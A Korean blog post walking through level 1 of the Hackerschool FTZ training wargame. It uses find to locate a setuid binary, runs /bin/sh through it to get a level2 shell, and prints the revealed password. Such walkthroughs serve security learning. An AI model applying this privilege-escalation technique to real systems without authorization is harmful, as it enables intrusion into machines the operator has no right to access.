Hackerschool FTZ level1

2011. 5. 29. 18:31·Wargame/FTZ

Category : System hacking

ssh://ftz.hackerschool.org
id : level1
pw : level1

Summary : Excute shell

  • 서버에 접속하여 디렉토리에 있는 파일들을 확인해보면 hint라는 파일을 확인할 수 있다.
[level1@ftz level1]$ ls -l
합계 12
-rw-r--r--    1 root     root           47  4월  4  2000 hint
drwxr-xr-x    2 root     level1       4096 12월  7  2003 public_html
drwxrwxr-x    2 root     level1       4096  7월 10 13:08 tmp
[level1@ftz level1]$ cat hint
level2 권한에 setuid가 걸린 파일을 찾는다.
  • level2 user에 setuid가 걸려있으므로 권한은 최소한 4000이상이어야 한다.
  • 파일이 어디에있는지 모르므로 루트디렉토리( / )에서부터 검색해아야한다.
  • 이 조건을 토대로 find 명령어를 이용해 파일을 검색한다.
[level1@ftz level1]$ find / -user level2 -perm -4000 2> /dev/null
/bin/ExcuteMe
[level1@ftz level1]$ ls -l /bin/ExcuteMe
-rwsr-sr-x    1 level2   level1      23625  3월 29  2003 /bin/ExcuteMe
  • bin/ExcuteMe 찾았다. 실행권한이 있으므로 실행시켜본다.
[level1@ftz level1]$ ExcuteMe
  레벨2의 권한으로 당신이 원하는 명령어를
  한가지 실행시켜 드리겠습니다.
  (단, my-pass 와 chmod는 제외)

  어떤 명령을 실행시키겠습니까?
  [level2@ftz level2]$ id

uid=3002(level2) gid=3001(level1) groups=3001(level1)
  • level2의 권한으로 입력받은 명령을 실행시켜주는 프로그램이다.
  • 다시 실행하여 /bin/sh 쉘을 실행한다.
 [level1@ftz level1]$ ExcuteMe
  레벨2의 권한으로 당신이 원하는 명령어를
  한가지 실행시켜 드리겠습니다.
  (단, my-pass 와 chmod는 제외)

  어떤 명령을 실행시키겠습니까?

  [level2@ftz level2]$ /bin/sh

sh-2.05b$ id
uid=3002(level2) gid=3001(level1) groups=3001(level1)
sh-2.05b$ my-pass

Level2 Password is "hacker or cracker".
  • level2 권한의 쉘을 획득하고 level2의 password를 확인할 수 있었다.

'Wargame > FTZ' 카테고리의 다른 글

Hackerschool FTZ level6  (0) 2011.07.17
Hackerschool FTZ level5  (1) 2011.07.17
Hackerschool FTZ level4  (0) 2011.07.17
Hackerschool FTZ level3  (0) 2011.07.17
Hackerschool FTZ level2  (0) 2011.07.17
'Wargame/FTZ' 카테고리의 다른 글
  • Hackerschool FTZ level5
  • Hackerschool FTZ level4
  • Hackerschool FTZ level3
  • Hackerschool FTZ level2
pwn3r_45
pwn3r_45
  • pwn3r_45
    pwn3r_45
    pwn3r_45
  • 전체
    오늘
    어제
    • View All (155)
      • Paper (0)
        • Power Grid (0)
        • Software_Kernel (0)
        • Exploitation (0)
        • RTOS (0)
        • UAV (0)
        • SCADA (0)
      • Articles (0)
      • Personal (18)
      • Technical Note (9)
        • Hardware (1)
        • Vulnerability Research (8)
        • Binary Exploitation (5)
        • PR23 (0)
        • Vulnerability (1)
        • Linux Kernel (1)
        • 현대암호 (0)
      • CTF (90)
        • 2025 (0)
        • 2024 (1)
        • 2023 (5)
        • 2019 (5)
        • 2018 (20)
        • 2017 (7)
        • 2016 (6)
        • 2015 (1)
        • 2014 (3)
        • 2013 (14)
        • 2012 (6)
      • Wargame (22)
        • FTZ (13)
        • Lord Of Bof - Redhat 6.2 (0)
        • IO.smashthestack.org (5)
        • Amateria.smashthestack.org (0)
        • pwnable.tw (0)
        • Vortex.overthewire.org (3)
        • Webhacking.kr (0)
        • reversing.kr (0)
        • dreamhack.io (0)
        • CodeEngn (1)
      • Reverse engineering (1)
      • Issue (13)
        • Conference_CTF info (13)
      • Coding (0)
        • C# (0)
      • ETC (2)
      • 미완성 (0)
  • 블로그 메뉴

    • Home
    • Tag
    • MediaLog
    • LocationLog
    • Guestbook
    • Admin
    • Write
  • 링크

    • 6l4ck3y3
    • idkwim
    • gogil
    • dakuo
    • badcob
    • 임준오씨 블로그
    • 김용진씨 블로그
    • david942j
    • orange tsai
    • pwndiary
    • theori
    • tacxingxing
    • jinmo123's team blog
    • ConS-tanT
    • jaybosamiya
    • procdiaru
  • 공지사항

  • 인기 글

  • 태그

    power of community
    pwnables
    후기
    vuln
    csaw ctf
    web
    정보보호올림피아드
    HUST
    gnuboard
    HUST2011
    csaw
    POC
  • 최근 댓글

  • 최근 글

  • hELLO· Designed By정상우.v4.10.3
pwn3r_45
Hackerschool FTZ level1
상단으로

티스토리툴바